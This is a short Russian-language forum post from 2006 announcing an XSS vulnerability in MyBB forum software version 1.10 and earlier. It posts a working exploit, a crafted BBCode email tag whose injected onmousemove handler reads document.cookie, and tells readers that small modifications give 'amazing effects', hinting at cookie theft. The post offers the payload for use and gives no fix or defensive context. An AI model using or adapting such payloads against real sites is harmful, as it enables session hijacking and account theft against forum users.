Форумы Свеженькая XSS уязвимость в форуме mybb 1.10

Discussion in 'Уязвимости CMS/форумов' started by Vantuz86, 11 Apr 2006.

  1. Vantuz86

    Vantuz86 New Member

    Joined:
    10 Apr 2006
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Новая XSS уязвимость на форуме mybb версии 1.10 и ниже.
    Вот эксплойт

    Code:
    [email=a" onmousemove="alert(document.cookie);" mail@mail.ru]Нажми сюда![/email]

    При небольшой модификации
    onmousemove="alert(document.cookie);"
     можно получить удивительные эффекты!!!
     
    #1 Vantuz86, 11 Apr 2006
    Last edited: 11 Apr 2006
(You must log in or sign up to post here.)